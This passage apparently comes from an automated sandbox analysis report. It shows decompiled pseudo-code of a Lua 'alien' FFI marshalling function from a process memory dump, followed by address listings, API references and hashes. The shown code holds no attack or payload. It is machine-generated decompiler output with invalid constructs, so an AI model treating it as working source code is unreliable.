								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								goto L0;
							case 0x11:
								L20:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t251 =  *((intOrPtr*)(_t275 - 0x14));
					 *((intOrPtr*)(_t275 - 0x3c)) = 0;
					_t226 =  *(_t251 + 0xc);
					if(_t226 > 0xc) {
						L58:
						_t227 =  *(_t251 + 8);
						if(_t227 == 0) {
							_t227 = "anonymous";
						}
						_push(_t227);
						_push("alien: unknown return type (function %s)");
						_push(_t273);
						L00A23F26();
						L61:
						_t279 = _t278 + 0xc;
						L62:
						 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) +  ~( *(_t275 - 0x48)) * 4;
						 *((intOrPtr*)(_t275 - 0x2c)) =  *((intOrPtr*)(_t275 - 0x2c)) -  *((intOrPtr*)(_t275 - 0x30));
						_t271 = 0;
						 *((intOrPtr*)(_t275 - 0x28)) =  *((intOrPtr*)(_t275 - 0x28)) +  ~( *(_t275 - 0x38)) * 4;
						if( *((intOrPtr*)(_t275 - 0x44)) <= 0) {
							L72:
							_pop(_t272);
							_pop(_t274);
							_pop(_t247);
							return E00A245A4( *((intOrPtr*)(_t275 - 0x30)) +  *((intOrPtr*)(_t275 - 0x34)) +  *(_t275 - 0x38) +  *(_t275 - 0x48) + 1, _t247,  *(_t275 - 4) ^ _t275,  *(_t275 - 0x48), _t272, _t274);
						} else {
							goto L63;
						}
						do {
							L63:
							_t238 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 0x30)) + _t271 * 4)) + 0xfffffff3;
							if(_t238 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t238 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t282 = _t279 - 8;
									 *_t282 = _t289;
									_push(_t273);
									L00A23F80();
									_t279 = _t282 + 0xc;
									 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t271 = _t271 + 1;
						} while (_t271 <  *((intOrPtr*)(_t275 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t226 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t245, _t261, _t270, _t289,  *((intOrPtr*)(_t275 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 4)), 0, _t270);
							_push(_t273);
							L00A23F74();
							_t279 = _t278 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a224a2
0x00a224a2
0x00a224a2
0x00a224a2
0x00a224a2
0x00a224a2
0x00a224a4
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224c1
0x00a224c3
0x00a224c8
0x00a224cb
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A224A4
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: ca58d52c4f66e049e2aa76f477a3d0a7f2c8f408520605d829c1c6f4e53f9756
Instruction ID: effa38de718542e1f3a58e715dc805e2932139ab80024417f394910bd47ce42b
Opcode Fuzzy Hash: ca58d52c4f66e049e2aa76f477a3d0a7f2c8f408520605d829c1c6f4e53f9756
Instruction Fuzzy Hash: B4B183B5D04129ABCB04EF98FE81DEEBBB8FF49300F144528F441B7246D639AA15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A221DA, Relevance: 25.8, APIs: 17, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A221DA(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				char _t220;
				signed int _t223;
				char* _t224;
				signed int _t225;
				char* _t226;
				signed int _t237;
				void* _t244;
				void* _t246;
				char* _t247;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t268;
				signed int _t269;
				void* _t270;
				void* _t272;
				signed int _t273;
				intOrPtr _t275;
				intOrPtr _t276;
				void* _t277;
				long long _t287;

				L0:
				while(1) {
					L0:
					_t287 = __fp0;
					_t268 = __edi;
					_t220 = E00A246A0(4);
					 *((intOrPtr*)(_t273 - 8)) = _t275;
					_push(_t244);
					L00A23F62();
					_t247 =  *((intOrPtr*)(_t273 - 8));
					 *_t247 = _t220;
					_t276 = _t275 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t273 - 0xc)) + __edi)) = _t247;
					while(1) {
						L36:
						 *((intOrPtr*)(_t273 - 0xc)) =  *((intOrPtr*)(_t273 - 0xc)) + 4;
						_t244 = _t244 + 1;
						_t116 = _t273 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t273 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t248 =  *((intOrPtr*)(_t273 - 0x14));
						_t223 =  *( *((intOrPtr*)(_t273 - 0xc)) +  *((intOrPtr*)(_t248 + 0x30)));
						if(_t223 > 0x11) {
							L33:
							_t224 =  *(_t248 + 8);
							if(_t224 == 0) {
								_t224 = "anonymous";
							}
							_push(_t224);
							_push(_t244);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t271);
							L00A23F26();
							_t276 = _t276 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t223 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t242 = E00A246A0(4);
								 *((intOrPtr*)(_t273 - 8)) = _t276;
								_push(_t244);
								_push(_t271);
								L00A23F68();
								_t276 = _t276 + 8;
								_t243 = E00A245C0(_t242, _t287);
								_t258 =  *((intOrPtr*)(_t273 - 8));
								_t259 =  *((intOrPtr*)(_t273 - 0xc));
								 *_t258 = _t243;
								 *((intOrPtr*)( *((intOrPtr*)(_t273 - 0xc)) + _t268)) = _t258;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L10:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L11:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								goto L0;
							case 0xa:
								L9:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L12:
								__eax = 4;
